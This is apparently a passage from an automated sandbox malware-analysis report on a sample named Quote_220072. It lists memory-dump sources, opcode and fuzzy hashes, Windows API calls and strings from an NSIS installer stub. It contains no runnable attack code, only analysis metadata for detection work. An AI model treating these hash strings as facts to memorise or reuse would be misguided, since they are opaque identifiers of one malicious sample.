                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f1ae00eb3372b6bb7c5a3e07f8e3493e2210060a97bb87bd68dd99a25373fe2d
                                                                              • Instruction ID: 1b95e81d5636bf6e070d50dccc3f7b5279ddfc705d6da36855959b45b44306b1
                                                                              • Opcode Fuzzy Hash: f1ae00eb3372b6bb7c5a3e07f8e3493e2210060a97bb87bd68dd99a25373fe2d
                                                                              • Instruction Fuzzy Hash: C451B135B412149BFB54A6ACD85476F239FEB8D760F20472AE01BDB7D4DDA8CC0243A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 34ee7845cb6be5870905478d1a4f66e3d5a332706fc35bbcd59696c66b926fbc
                                                                              • Instruction ID: 2475ba68e37369ad1e152111c9d4133932ada10a3fae87c9528ff1b19b5248e6
                                                                              • Opcode Fuzzy Hash: 34ee7845cb6be5870905478d1a4f66e3d5a332706fc35bbcd59696c66b926fbc
                                                                              • Instruction Fuzzy Hash: 5551BF34B412049BFB54A6ACD85476F239FEB8D660F20472AE01BDB7D4DDA8CC0243A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a5eed07b716dc6b56e4c35f01894a44768924583282612311f08918d562ea53f
                                                                              • Instruction ID: 506a7fa83846dc38114c5df8dc38d17fe00e6b7cf4cb182a7045dd2fb7395022
                                                                              • Opcode Fuzzy Hash: a5eed07b716dc6b56e4c35f01894a44768924583282612311f08918d562ea53f
                                                                              • Instruction Fuzzy Hash: EC51F331B41205DFFB04AFB8D8482ADB7B6EF8C265F148A6AD006EB250DF398855C781
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 72b1399f0b47fed00f60e56106aa91a1a26cbe29a4a4c1ae79d36309e0f8594d
                                                                              • Instruction ID: 67590bddb64c9e647cfe509ca06884ebefd377d6b4b6770eef438c10ac504cb8
                                                                              • Opcode Fuzzy Hash: 72b1399f0b47fed00f60e56106aa91a1a26cbe29a4a4c1ae79d36309e0f8594d
                                                                              • Instruction Fuzzy Hash: 06411672E047559FDB04CFA9D8006EEBBB5EF8D210F18866BD404EB241DB78A841CBD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 383a8768b8aa68be579bc82533beed31d84b22489af58c6f418a22f33a9479ad
                                                                              • Instruction ID: 9c627843592732a5a6e2c244829078e0865f635f4439a7e85e779e2406f9c4d8
                                                                              • Opcode Fuzzy Hash: 383a8768b8aa68be579bc82533beed31d84b22489af58c6f418a22f33a9479ad
                                                                              • Instruction Fuzzy Hash: 30416C35701315CFEB14DFB8D8907AD77B2BF99205F208669D416AB3A0DF70A946CB81
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2585646999.000000003470D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3470D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3470d000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 19a6e728a94a98cef5aae002a03ec14f92119ef27f8595ced78d4bf5ba34da76
                                                                              • Instruction ID: ad1f300a9e5a8d6042e3d4a6a7f460c5a5777cd81b3941e900c89c01731f6197
                                                                              • Opcode Fuzzy Hash: 19a6e728a94a98cef5aae002a03ec14f92119ef27f8595ced78d4bf5ba34da76
                                                                              • Instruction Fuzzy Hash: 7B21CF75605344AFEB04DF20E9C0B06BBA6EB88214F24C9A9D84D4F386C736D846CE62
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2585646999.000000003470D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3470D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3470d000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7354102e7e73433b83bffa94b062deb6420bf7c84ff88977fa329be4ee706fd3
                                                                              • Instruction ID: f57fbc9d05e89c04f892362e04e421cfe0e263a7984299bdd5e99610cb44170e
                                                                              • Opcode Fuzzy Hash: 7354102e7e73433b83bffa94b062deb6420bf7c84ff88977fa329be4ee706fd3
                                                                              • Instruction Fuzzy Hash: AD216F755093809FD702CF20D994705BFB2EB46214F28C5DAD8498F6A7C33A984ACF62
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 609b7693b842e8cdb60fa8e2a8f3077be23fac3d9b49bdf224475e1640c7a10f
                                                                              • Instruction ID: cbe58080f81d7789bb8e9d90a135e380bd2c9faf9101d413771429226b129f7c
                                                                              • Opcode Fuzzy Hash: 609b7693b842e8cdb60fa8e2a8f3077be23fac3d9b49bdf224475e1640c7a10f
                                                                              • Instruction Fuzzy Hash: D901D435B042200FF715853D9855B2E6BDADBCA764F14893EE00ACF352DE25DC0743A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d035c9be0bc6238270d205cd959729e82d254a419b85c59b0c0e3dfd55369a92
                                                                              • Instruction ID: 383133222587585dd355e4ef3ef5aa8735ec847efb9d0102ad98c15e8b52a641
                                                                              • Opcode Fuzzy Hash: d035c9be0bc6238270d205cd959729e82d254a419b85c59b0c0e3dfd55369a92
                                                                              • Instruction Fuzzy Hash: 6F01D43430A7508FE715E63998A022E779B9FCE06874A453DD10A8F392CF75DC068397
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 818d2792f063c8c0b2378fb23ebc1371b92f1c43c69812af5976a90aece78faf
                                                                              • Instruction ID: f3e27f21b78bd69eb93ea65300048ad36794e782f1c9b576b196a086b95be551
                                                                              • Opcode Fuzzy Hash: 818d2792f063c8c0b2378fb23ebc1371b92f1c43c69812af5976a90aece78faf
                                                                              • Instruction Fuzzy Hash: 5E01AF35B001101BFB15957DA558B2FA7DADBC9B64F20893EE00ACB352EE35DC0343A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2585615726.00000000346FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 346FD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_346fd000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe90cbda5ff6e94277ca358a30ab4e7850a39c54046ef499a93ad652e4d1620b
                                                                              • Instruction ID: 86a832f8e0d64e800ed4f43ee33218180c0c6e34745629b4d48ea9eb1a6bb7e9
                                                                              • Opcode Fuzzy Hash: fe90cbda5ff6e94277ca358a30ab4e7850a39c54046ef499a93ad652e4d1620b
                                                                              • Instruction Fuzzy Hash: DDF0CD72508340AFE7108F16CD84B62FF98EF52264F18C45AED4C0A287C27AA840CAB2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7290c9e6c1fef26ce503ae20d9c68486a39eb184afa15bc16f06c3de7ecec477
                                                                              • Instruction ID: 88e989553afc9bc7bf9d14dab7e44c3118fed140da6e079a22e132e73385d8af
                                                                              • Opcode Fuzzy Hash: 7290c9e6c1fef26ce503ae20d9c68486a39eb184afa15bc16f06c3de7ecec477
                                                                              • Instruction Fuzzy Hash: BDE02236B412282BAF1459759C04CEFBB6BE7C9164F044A7AED02E7241CA39592683C0
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00008001), ref: 004036F6
                                                                              • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2564589039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.2564548754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2564618599.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2564657123.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2564799193.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorModeVersion
                                                                              • String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
                                                                              • API String ID: 3050056751-1170945346
                                                                              • Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                              • Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
                                                                              • Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                              • Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                              • wsprintfW.USER32 ref: 004061CF
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2564589039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.2564548754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2564618599.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2564657123.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2564799193.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                              • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                              • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                              • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2564589039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.2564548754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2564618599.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2564657123.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2564799193.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                              • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                              • API String ID: 2547128583-890815371
                                                                              • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                              • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                              • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                              • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD